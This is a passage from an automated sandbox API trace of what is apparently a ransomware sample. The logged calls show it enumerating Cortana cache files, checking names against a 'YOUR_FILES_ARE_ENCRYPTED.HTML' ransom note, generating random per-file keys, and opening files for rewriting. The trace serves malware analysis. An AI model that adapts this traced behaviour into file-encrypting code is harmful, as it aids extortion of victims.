NumberOfConcurrentThreads=0x0) returned 0x274 [0119.079] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x680348, lpOverlapped=0x680348) returned 1 [0119.080] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xec173241, ftCreationTime.dwHighDateTime=0x1d7045f, ftLastAccessTime.dwLowDateTime=0xec173241, ftLastAccessTime.dwHighDateTime=0x1d7045f, ftLastWriteTime.dwLowDateTime=0x39796d8e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x67d, dwReserved0=0x318f740, dwReserved1=0x63d098, cFileName="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_27[1].txt", cAlternateFileName="C_1617~1.TXT")) returned 1 [0119.080] StrStrIW (lpFirst="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_27[1].txt", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.080] wnsprintfW (in: pszDest=0x670340, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_27[1].txt") returned 197 [0119.080] PathFindExtensionW (pszPath="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_27[1].txt") returned=".txt" [0119.080] lstrlenW (lpString=".txt") returned 4 [0119.081] PathFindExtensionW (pszPath="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_27[1].txt") returned=".txt" [0119.081] SystemFunction036 (in: RandomBuffer=0x19d830, RandomBufferLength=0x20 | out: RandomBuffer=0x19d830) returned 1 [0119.081] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_27[1].txt" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\appcache\\c1j92j4x\\6\\c__windows_systemapps_microsoft.windows.cortana_cw5n1h2txyewy_cache_desktop_27[1].txt"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x334 [0119.084] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x19d854 | out: lpFileSize=0x19d854*=1661) returned 1 [0119.084] GetProcessHeap () returned 0x600000 [0119.084] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x680348 [0119.084] wsprintfW (in: param_1=0x19d76e, param_2="%02X" | out: param_1="BB") returned 2 [0119.084] wsprintfW (in: param_1=0x19d772, param_2="%02X" | out: param_1="34") returned 2 [0119.085] wsprintfW (in: param_1=0x19d776, param_2="%02X" | out: param_1="48") returned 2 [0119.085] wsprintfW (in: param_1=0x19d77a, param_2="%02X" | out: param_1="CB") returned 2 [0119.085] wsprintfW (in: param_1=0x19d77e, param_2="%02X" | out: param_1="D7") returned 2 [0119.085] wsprintfW (in: param_1=0x19d782, param_2="%02X" | out: param_1="11") returned 2 [0119.085] wsprintfW (in: param_1=0x19d786, param_2="%02X" | out: param_1="4E") returned 2 [0119.085] wsprintfW (in: param_1=0x19d78a, param_2="%02X" | out: param_1="45") returned 2 [0119.085] wsprintfW (in: param_1=0x19d78e, param_2="%02X" | out: param_1="32") returned 2 [0119.085] wsprintfW (in: param_1=0x19d792, param_2="%02X" | out: param_1="5A") returned 2 [0119.085] wsprintfW (in: param_1=0x19d796, param_2="%02X" | out: param_1="2C") returned 2 [0119.085] wsprintfW (in: param_1=0x19d79a, param_2="%02X" | out: param_1="53") returned 2 [0119.085] wsprintfW (in: param_1=0x19d79e, param_2="%02X" | out: param_1="71") returned 2 [0119.085] wsprintfW (in: param_1=0x19d7a2, param_2="%02X" | out: param_1="EE") returned 2 [0119.085] wsprintfW (in: param_1=0x19d7a6, param_2="%02X" | out: param_1="32") returned 2 [0119.085] wsprintfW (in: param_1=0x19d7aa, param_2="%02X" | out: param_1="CF") returned 2 [0119.085] wsprintfW (in: param_1=0x19d7ae, param_2="%02X" | out: param_1="4B") returned 2 [0119.085] wsprintfW (in: param_1=0x19d7b2, param_2="%02X" | out: param_1="B4") returned 2 [0119.085] wsprintfW (in: param_1=0x19d7b6, param_2="%02X" | out: param_1="B0") returned 2 [0119.085] wsprintfW (in: param_1=0x19d7ba, param_2="%02X" | out: param_1="62") returned 2 [0119.085] wsprintfW (in: param_1=0x19d7be, param_2="%02X" | out: param_1="6E") returned 2 [0119.085] wsprintfW (in: param_1=0x19d7c2, param_2="%02X" | out: param_1="48") returned 2 [0119.085] wsprintfW (in: param_1=0x19d7c6, param_2="%02X" | out: param_1="26") returned 2 [0119.085] wsprintfW (in: param_1=0x19d7ca, param_2="%02X" | out: param_1="4E") returned 2 [0119.085] wsprintfW (in: param_1=0x19d7ce, param_2="%02X" | out: param_1="44") returned 2 [0119.085] wsprintfW (in: param_1=0x19d7d2, param_2="%02X" | out: param_1="91") returned 2 [0119.085] wsprintfW (in: param_1=0x19d7d6, param_2="%02X" | out: param_1="94") returned 2 [0119.085] wsprintfW (in: param_1=0x19d7da, param_2="%02X" | out: param_1="F1") returned 2 [0119.085] wsprintfW (in: param_1=0x19d7de, param_2="%02X" | out: param_1="0D") returned 2 [0119.085] wsprintfW (in: param_1=0x19d7e2, param_2="%02X" | out: param_1="0D") returned 2 [0119.085] wsprintfW (in: param_1=0x19d7e6, param_2="%02X" | out: param_1="B9") returned 2 [0119.085] wsprintfW (in: param_1=0x19d7ea, param_2="%02X" | out: param_1="26") returned 2 [0119.086] lstrcpyW (in: lpString1=0x6903fc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_27[1].txt" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_27[1].txt") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_27[1].txt" [0119.086] CreateIoCompletionPort (FileHandle=0x334, ExistingCompletionPort=0x274, CompletionKey=0x680348, NumberOfConcurrentThreads=0x0) returned 0x274 [0119.086] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x680348, lpOverlapped=0x680348) returned 1 [0119.087] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xec173241, ftCreationTime.dwHighDateTime=0x1d7045f, ftLastAccessTime.dwLowDateTime=0xec173241, ftLastAccessTime.dwHighDateTime=0x1d7045f, ftLastWriteTime.dwLowDateTime=0x59ee1314, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x1eabf, dwReserved0=0x318f740, dwReserved1=0x63d098, cFileName="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_28[1].txt", cAlternateFileName="C_2F38~1.TXT")) returned 1 [0119.087] StrStrIW (lpFirst="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_28[1].txt", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.087] wnsprintfW (in: pszDest=0x670340, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_28[1].txt") returned 197 [0119.090] PathFindExtensionW (pszPath="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_28[1].txt") returned=".txt" [0119.090] lstrlenW (lpString=".txt") returned 4 [0119.090] PathFindExtensionW (pszPath="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_28[1].txt") returned=".txt" [0119.090] SystemFunction036 (in: RandomBuffer=0x19d830, RandomBufferLength=0x20 | out: RandomBuffer=0x19d830) returned 1 [0119.090] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_28[1].txt" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\appcache\\c1j92j4x\\6\\c__windows_systemapps_microsoft.windows.cortana_cw5n1h2txyewy_cache_desktop_28[1].txt"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x334 [0119.091] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x19d854 | out: lpFileSize=0x19d854*=125631) returned 1 [0119.091] GetProcessHeap () returned 0x600000 [0119.091] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x680348 [0119.092] wsprintfW (in: param_1=0x19d76e, param_2="%02X" | out: param_1="CC") returned 2 [0119.092] wsprintfW (in: param_1=0x19d772, param_2="%02X" | out: param_1="09") returned 2 [0119.092] wsprintfW (in: param_1=0x19d776, param_2="%02X" | out: param_1="88") returned 2 [0119.092] wsprintfW (in: param_1=0x19d77a, param_2="%02X" | out: param_1="67") returned 2 [0119.092] wsprintfW (in: param_1=0x19d77e, param_2="%02X" | out: param_1="30") returned 2 [0119.092] wsprintfW (in: param_1=0x19d782, param_2="%02X" | out: param_1="BD") returned 2 [0119.092] wsprintfW (in: param_1=0x19d786, param_2="%02X" | out: param_1="C3") returned 2 [0119.092] wsprintfW (in: param_1=0x19d78a, param_2="%02X" | out: param_1="E2") returned 2 [0119.092] wsprintfW (in: param_1=0x19d78e, param_2="%02X" | out: param_1="A9") returned 2 [0119.092] wsprintfW (in: param_1=0x19d792, param_2="%02X" | out: param_1="82") returned 2 [0119.092] wsprintfW (in: param_1=0x19d796, param_2="%02X" | out: param_1="55") returned 2 [0119.092] wsprintfW (in: param_1=0x19d79a, param_2="%02X" | out: param_1="D4") returned 2 [0119.092] wsprintfW (in: param_1=0x19d79e, param_2="%02X" | out: param_1="59") returned 2 [0119.092] wsprintfW (in: param_1=0x19d7a2, param_2="%02X" | out: param_1="A4") returned 2 [0119.092] wsprintfW (in: param_1=0x19d7a6, param_2="%02X" | out: param_1="B6") returned 2 [0119.092] wsprintfW (in: param_1=0x19d7aa, param_2="%02X" | out: param_1="40") returned 2 [0119.092] wsprintfW (in: param_1=0x19d7ae, param_2="%02X" | out: param_1="15") returned 2 [0119.092] wsprintfW (in: param_1=0x19d7b2, param_2="%02X" | out: param_1="BE") returned 2 [0119.092] wsprintfW (in: param_1=0x19d7b6, param_2="%02X" | out: param_1="C2") returned 2 [0119.092] wsprintfW (in: param_1=0x19d7ba, param_2="%02X" | out: param_1="EC") returned 2 [0119.092] wsprintfW (in: param_1=0x19d7be, param_2="%02X" | out: param_1="72") returned 2 [0119.092] wsprintfW (in: param_1=0x19d7c2, param_2="%02X" | out: param_1="67") returned 2 [0119.092] wsprintfW (in: param_1=0x19d7c6, param_2="%02X" | out: param_1="1E") returned 2 [0119.092] wsprintfW (in: param_1=0x19d7ca, param_2="%02X" | out: param_1="60") returned 2 [0119.092] wsprintfW (in: param_1=0x19d7ce, param_2="%02X" | out: param_1="60") returned 2 [0119.092] wsprintfW (in: param_1=0x19d7d2, param_2="%02X" | out: param_1="4A") returned 2 [0119.092] wsprintfW (in: param_1=0x19d7d6, param_2="%02X" | out: param_1="73") returned 2 [0119.092] wsprintfW (in: param_1=0x19d7da, param_2="%02X" | out: param_1="C2") returned 2 [0119.092] wsprintfW (in: param_1=0x19d7de, param_2="%02X" | out: param_1="43") returned 2 [0119.092] wsprintfW (in: param_1=0x19d7e2, param_2="%02X" | out: param_1="75") returned 2 [0119.092] wsprintfW (in: param_1=0x19d7e6, param_2="%02X" | out: param_1="36") returned 2 [0119.092] wsprintfW (in: param_1=0x19d7ea, param_2="%02X" | out: param_1="48") returned 2 [0119.093] lstrcpyW (in: lpString1=0x6903fc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_28[1].txt" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_28[1].txt") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_28[1].txt" [0119.093] CreateIoCompletionPort (FileHandle=0x334, ExistingCompletionPort=0x274, CompletionKey=0x680348, NumberOfConcurrentThreads=0x0) returned 0x274 [0119.093] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x680348, lpOverlapped=0x680348) returned 1 [0119.095] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xebd9357f, ftCreationTime.dwHighDateTime=0x1d7045f, ftLastAccessTime.dwLowDateTime=0xebd9357f, ftLastAccessTime.dwHighDateTime=0x1d7045f, ftLastWriteTime.dwLowDateTime=0x59ebb0a5, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x42840, dwReserved0=0x318f740, dwReserved1=0x63d098, cFileName="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_2[1].txt", cAlternateFileName="C__WIN~1.TXT")) returned 1 [0119.095] StrStrIW (lpFirst="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_2[1].txt", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.095] wnsprintfW (in: pszDest=0x670340, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_2[1].txt") returned 196 [0119.095] PathFindExtensionW (pszPath="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_2[1].txt") returned=".txt" [0119.095] lstrlenW (lpString=".txt") returned 4 [0119.095] PathFindExtensionW (pszPath="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_2[1].txt") returned=".txt" [0119.095] SystemFunction036 (in: RandomBuffer=0x19d830, RandomBufferLength=0x20 | out: RandomBuffer=0x19d830) returned 1 [0119.096] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_2[1].txt" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\appcache\\c1j92j4x\\6\\c__windows_systemapps_microsoft.windows.cortana_cw5n1h2txyewy_cache_desktop_2[1].txt"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0119.096] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xebdbc8f6, ftCreationTime.dwHighDateTime=0x1d7045f, ftLastAccessTime.dwLowDateTime=0xebdbc8f6, ftLastAccessTime.dwHighDateTime=0x1d7045f, ftLastWriteTime.dwLowDateTime=0x59e94e30, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x3e1eb, dwReserved0=0x318f740, dwReserved1=0x63d098, cFileName="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_3[1].txt", cAlternateFileName="C__WIN~2.TXT")) returned 1 [0119.096] StrStrIW (lpFirst="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_3[1].txt", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.096] wnsprintfW (in: pszDest=0x670340, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_3[1].txt") returned 196 [0119.096] PathFindExtensionW (pszPath="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_3[1].txt") returned=".txt" [0119.096] lstrlenW (lpString=".txt") returned 4 [0119.096] PathFindExtensionW (pszPath="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_3[1].txt") returned=".txt" [0119.096] SystemFunction036 (in: RandomBuffer=0x19d830, RandomBufferLength=0x20 | out: RandomBuffer=0x19d830) returned 1 [0119.097] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_3[1].txt" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\appcache\\c1j92j4x\\6\\c__windows_systemapps_microsoft.windows.cortana_cw5n1h2txyewy_cache_desktop_3[1].txt"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x334 [0119.099] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x19d854 | out: lpFileSize=0x19d854*=254443) returned 1 [0119.099] GetProcessHeap () returned 0x600000 [0119.099] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x680348 [0119.100] wsprintfW (in: param_1=0x19d76e, param_2="%02X" | out: param_1="95") returned 2 [0119.100] wsprintfW (in: param_1=0x19d772, param_2="%02X" | out: param_1="62") returned 2 [0119.100] wsprintfW (in: param_1=0x19d776, param_2="%02X" | out: param_1="10") returned 2 [0119.100] wsprintfW (in: param_1=0x19d77a, param_2="%02X" | out: param_1="21") returned 2 [0119.100] wsprintfW (in: param_1=0x19d77e, param_2="%02X" | out: param_1="B0") returned 2 [0119.100] wsprintfW (in: param_1=0x19d782, param_2="%02X" | out: param_1="AC") returned 2 [0119.100] wsprintfW (in: param_1=0x19d786, param_2="%02X" | out: param_1="98") returned 2 [0119.100] wsprintfW (in: param_1=0x19d78a, param_2="%02X" | out: param_1="B9") returned 2 [0119.100] wsprintfW (in: param_1=0x19d78e, param_2="%02X" | out: param_1="07") returned 2 [0119.100] wsprintfW (in: param_1=0x19d792, param_2="%02X" | out: param_1="AE") returned 2 [0119.100] wsprintfW (in: param_1=0x19d796, param_2="%02X" | out: param_1="B4") returned 2 [0119.100] wsprintfW (in: param_1=0x19d79a, param_2="%02X" | out: param_1="4B") returned 2 [0119.100] wsprintfW (in: param_1=0x19d79e, param_2="%02X" | out: param_1="6C") returned 2 [0119.100] wsprintfW (in: param_1=0x19d7a2, param_2="%02X" | out: param_1="A8") returned 2 [0119.101] wsprintfW (in: param_1=0x19d7a6, param_2="%02X" | out: param_1="25") returned 2 [0119.101] wsprintfW (in: param_1=0x19d7aa, param_2="%02X" | out: param_1="74") returned 2 [0119.101] wsprintfW (in: param_1=0x19d7ae, param_2="%02X" | out: param_1="FF") returned 2 [0119.101] wsprintfW (in: param_1=0x19d7b2, param_2="%02X" | out: param_1="8E") returned 2 [0119.101] wsprintfW (in: param_1=0x19d7b6, param_2="%02X" | out: param_1="30") returned 2 [0119.101] wsprintfW (in: param_1=0x19d7ba, param_2="%02X" | out: param_1="F0") returned 2 [0119.101] wsprintfW (in: param_1=0x19d7be, param_2="%02X" | out: param_1="64") returned 2 [0119.101] wsprintfW (in: param_1=0x19d7c2, param_2="%02X" | out: param_1="57") returned 2 [0119.101] wsprintfW (in: param_1=0x19d7c6, param_2="%02X" | out: param_1="EC") returned 2 [0119.101] wsprintfW (in: param_1=0x19d7ca, param_2="%02X" | out: param_1="E6") returned 2 [0119.101] wsprintfW (in: param_1=0x19d7ce, param_2="%02X" | out: param_1="78") returned 2 [0119.101] wsprintfW (in: param_1=0x19d7d2, param_2="%02X" | out: param_1="F3") returned 2 [0119.101] wsprintfW (in: param_1=0x19d7d6, param_2="%02X" | out: param_1="22") returned 2 [0119.101] wsprintfW (in: param_1=0x19d7da, param_2="%02X" | out: param_1="B1") returned 2 [0119.101] wsprintfW (in: param_1=0x19d7de, param_2="%02X" | out: param_1="63") returned 2 [0119.101] wsprintfW (in: param_1=0x19d7e2, param_2="%02X" | out: param_1="8F") returned 2 [0119.101] wsprintfW (in: param_1=0x19d7e6, param_2="%02X" | out: param_1="4D") returned 2 [0119.101] wsprintfW (in: param_1=0x19d7ea, param_2="%02X" | out: param_1="32") returned 2 [0119.102] lstrcpyW (in: lpString1=0x6903fc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_3[1].txt" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_3[1].txt") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_3[1].txt" [0119.102] CreateIoCompletionPort (FileHandle=0x334, ExistingCompletionPort=0x274, CompletionKey=0x680348, NumberOfConcurrentThreads=0x0) returned 0x274 [0119.102] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x680348, lpOverlapped=0x680348) returned 1 [0119.105] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xebdbc8f6, ftCreationTime.dwHighDateTime=0x1d7045f, ftLastAccessTime.dwLowDateTime=0xebdbc8f6, ftLastAccessTime.dwHighDateTime=0x1d7045f, ftLastWriteTime.dwLowDateTime=0x59e94e30, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x1d94, dwReserved0=0x318f740, dwReserved1=0x63d098, cFileName="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_4[1].txt", cAlternateFileName="C__WIN~3.TXT")) returned 1 [0119.106] StrStrIW (lpFirst="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_4[1].txt", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.106] wnsprintfW (in: pszDest=0x670340, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_4[1].txt") returned 196 [0119.106] PathFindExtensionW (pszPath="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_4[1].txt") returned=".txt" [0119.106] lstrlenW (lpString=".txt") returned 4 [0119.106] PathFindExtensionW (pszPath="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_4[1].txt") returned=".txt" [0119.106] SystemFunction036 (in: RandomBuffer=0x19d830, RandomBufferLength=0x20 | out: RandomBuffer=0x19d830) returned 1 [0119.106] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_4[1].txt" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\appcache\\c1j92j4x\\6\\c__windows_systemapps_microsoft.windows.cortana_cw5n1h2txyewy_cache_desktop_4[1].txt"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x334 [0119.107] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x19d854 | out: lpFileSize=0x19d854*=7572) returned 1 [0119.107] GetProcessHeap () returned 0x600000 [0119.107] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x680348 [0119.107] wsprintfW (in: param_1=0x19d76e, param_2="%02X" | out: param_1="C3") returned 2 [0119.107] wsprintfW (in: param_1=0x19d772, param_2="%02X" | out: param_1="A2") returned 2 [0119.107] wsprintfW (in: param_1=0x19d776, param_2="%02X" | out: param_1="00") returned 2 [0119.107] wsprintfW (in: param_1=0x19d77a, param_2="%02X" | out: param_1="88") returned 2 [0119.107] wsprintfW (in: param_1=0x19d77e, param_2="%02X" | out: param_1="D0") returned 2 [0119.107] wsprintfW (in: param_1=0x19d782, param_2="%02X" | out: param_1="8B") returned 2 [0119.107] wsprintfW (in: param_1=0x19d786, param_2="%02X" | out: param_1="77") returned 2 [0119.107] wsprintfW (in: param_1=0x19d78a, param_2="%02X" | out: param_1="D0") returned 2 [0119.107] wsprintfW (in: param_1=0x19d78e, param_2="%02X" | out: param_1="9D") returned 2 [0119.107] wsprintfW (in: param_1=0x19d792, param_2="%02X" | out: param_1="E9") returned 2 [0119.107] wsprintfW (in: param_1=0x19d796, param_2="%02X" | out: param_1="98") returned 2 [0119.108] wsprintfW (in: param_1=0x19d79a, param_2="%02X" | out: param_1="72") returned 2 [0119.108] wsprintfW (in: param_1=0x19d79e, param_2="%02X" | out: param_1="3C") returned 2 [0119.108] wsprintfW (in: param_1=0x19d7a2, param_2="%02X" | out: param_1="FE") returned 2 [0119.108] wsprintfW (in: param_1=0x19d7a6, param_2="%02X" | out: param_1="F4") returned 2 [0119.108] wsprintfW (in: param_1=0x19d7aa, param_2="%02X" | out: param_1="7F") returned 2 [0119.108] wsprintfW (in: param_1=0x19d7ae, param_2="%02X" | out: param_1="82") returned 2 [0119.108] wsprintfW (in: param_1=0x19d7b2, param_2="%02X" | out: param_1="F0") returned 2 [0119.108] wsprintfW (in: param_1=0x19d7b6, param_2="%02X" | out: param_1="50") returned 2 [0119.108] wsprintfW (in: param_1=0x19d7ba, param_2="%02X" | out: param_1="B9") returned 